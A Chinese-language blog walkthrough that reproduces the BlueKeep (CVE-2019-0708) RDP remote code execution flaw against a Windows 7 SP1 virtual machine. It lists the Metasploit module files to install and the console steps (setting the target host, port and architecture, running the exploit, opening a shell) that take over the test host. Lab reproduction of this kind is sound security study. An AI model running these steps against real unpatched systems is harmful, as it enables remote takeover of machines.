CVE-2019-0708远程桌面代码执行漏洞复现

释放双眼,带上耳机,听听看~!

漏洞环境

使用VMware Fusion安装Windows7 SP1模拟测试机

Windows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

安全工具准备

  • 1.使用如下命令一键安装metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
  • 2.下载Reference(文末)中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

测试命令

使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP测试模块
使用info查看工具相关信息以及设置

可见关键设置主要为RHOSTSRPORT \ target

使用set RHOSTS 测试机IP设置受害机IP

使用set RPORT 测试害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置测试机机器架构

这里我们使用的是VMware Fusion,那么target 3满足条件

使用exploit开始攻击,等待建立连接

建立连接以后,使用shell获得shell,再使用python获得交互式shell

随即完成攻击,成功拿到测试主机权限

注意事项

1.靶机建议重新安装一台win7sp1,要允许任何人远程桌面连接

2.msf要升级到5

3.要替换文件为我文章里面的文件,全部都要替换。路径的话 我给的是全新安装msf的路径,你可以差不多find找找嘛

4.网络层问题要注意,比如:你的win7sp1在公网,你的msf在内网,你怎么打嘛?

5.target是主机架构选择的意思,一定要选对,vm装的win7sp1话,先试2,再试3,建议试一次重启靶机一次。选错架构会导致蓝屏、利用失败等问题

公众号回复:0708工具 获得下载相关安全工具



往期实战精彩回顾

从js信息泄露到webshell
从反渗透到病毒分析
HW之蜜罐总结
MSSQL注入的高级安全技术
zico靶机实战过程
MSSQL注入的高级安全技术
由一则敏感文档泄露事件溯源说起
从0day到未授权访问到文件包含到内网漫游

本文章来自清水川崎分享,仅供白帽子、安全爱好者研究学习,对于用于非法途径的行为,发布者及作者不承担任何责任。

我们建立了一个以知识共享为主的 免费精品 知识星球,旨在通过相互交流,促进资源分享和信息安全建设,为以此为生的工作者、即将步入此行业的学生等人士提供绵薄之力。目前星球已发布上千篇精品安全技术文章、教程、工具等内容,已加入上百位安全圈大咖及数千位安全从业者,期待在此共同与你交流。

如果你是安全行业精英,可以加入我们的微信群,目前聚集了来自全球的信息安全公司CEO,安全部门主管,技术总监,信安创业者,网络安全专家,安全实验室负责人,公司HR等。在这里将获得更多与安全大咖们面对面交流的机会,最新的安全动态,更真实的高薪信息安全岗位,更高效率的技术交流空间。可以扫码添加我的微信,需提供真实有效的公司名称+姓名,验证通过后可加入···


人已赞赏
安全工具

等级保护资料免费分享!

2019-10-11 17:04:49

安全工具

绕过安全设备的0day

2019-10-11 17:04:58

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索